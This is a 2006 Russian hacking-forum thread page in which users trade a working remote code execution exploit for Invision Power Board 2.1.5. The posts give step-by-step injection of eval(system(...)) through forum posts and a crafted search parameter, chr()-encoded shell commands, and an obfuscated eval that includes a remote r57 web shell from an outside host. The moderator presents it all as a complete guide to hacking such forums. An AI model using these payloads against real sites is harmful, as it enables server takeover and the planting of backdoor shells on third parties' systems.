ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Уязвимость Invision Power Board 2.1.5
   
Закрытая тема
Страница 11 из 11 « Первая < 7 8 9 10 11
 
Опции темы Поиск в этой теме Опции просмотра

  #101  
Старый 03.05.2006, 16:22
Аватар для xdye
xdye
Познающий
Регистрация: 03.04.2006
Сообщений: 31
Провел на форуме:
175806

Репутация: 14
По умолчанию
а ты про это? да я это юзал и щас юзаю тему четал самого начала так что я прсто не понял очень он говарит думал что что то новенькое ивени.
 

  #102  
Старый 03.05.2006, 21:36
Аватар для L1on
L1on
Новичок
Регистрация: 11.03.2006
Сообщений: 16
Провел на форуме:
22629

Репутация: 2
По умолчанию
Цитата:
Сообщение от Azazel  
Для тех у кого не получается со сплойтом, опишу как пользоваться ручками.
1. Постим сообщение eval(system(dir)); //'
2. В поиске ищем по своему нику все сообщения и не забываем поставить галочку на Show results as posts
3. В конце url дописываем &lastdate=z|eval.*?%20//)%23e%00
4. Enter. Выполняется dir.

Вставляю в сообщение eval(system(ls)); //' , выдаёт, как и надо, файлы на сервере, делаю eval(system(id)); //', работает, вообще, работают все команды из одного слова. Но когда пробую например ls -la, или which wget, то пишет ошибку. Но тогда и шелл нельзя залить... Что я делаю не так?
 

  #103  
Старый 04.05.2006, 11:34
Аватар для Black_Death
Black_Death
Новичок
Регистрация: 16.11.2004
Сообщений: 29
Провел на форуме:
47488

Репутация: -2
По умолчанию
Попробуй кодирование команд, например eval(system(chr(108).chr(115).chr(32).chr(45).chr( 108).chr(97)).chr(59).exit());//
 

  #104  
Старый 04.05.2006, 11:37
Аватар для ysmat
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
По умолчанию
Цитата:
Сообщение от TRes  
Может я дурак, но кроме phpinfo() ничего не выполняется положительный результат есть у кого?
а какие команды вобще существуют
и где можно почитать об них
 

  #105  
Старый 04.05.2006, 11:48
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
Цитата:
Попробуй кодирование команд, например eval(system(chr(108).chr(115).chr(32).chr(45).chr( 108).chr(97)).chr(59).exit());//
Именно так и надо. Странно, в топике уже про это писали, а вопросы всё возникают. В видео тоже кто-то так делал и ссылку выкладывал.
Цитата:
а какие команды вобще существуют и где можно почитать об них
1. http://forum.antichat.ru/thread7345.html
2. Поиск по форуму.
3. Google.ru
__________________
Full DNS report
 

  #106  
Старый 04.05.2006, 15:47
Аватар для TRes
TRes
Новичок
Регистрация: 22.04.2006
Сообщений: 20
Провел на форуме:
92091

Репутация: 5
Отправить сообщение для TRes с помощью ICQ
По умолчанию
Код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Include шелла RST. С ним все что угодно сделаете
 

  #107  
Старый 05.05.2006, 21:35
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
Тема выполнения произвольного кода на ИПБ закрыта. Всё что нужно для взлома в теме описано. Всё остальное в гугле. Ура!
__________________
Full DNS report
 
Закрытая тема
Страница 11 из 11 « Первая < 7 8 9 10 11



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Форумы 19 18.11.2006 09:19
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Эксплоит для Invision Power Board v2.1.3? xdx Форумы 8 08.02.2006 22:56
Invision Power Board <= 1.3.1 Login.PHP SQL Injection Как пользоваться? GrisS Форумы 16 02.02.2006 16:00
Вопрос про заливку шелла в Invision Power Board DiNo Форумы 14 03.03.2005 13:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ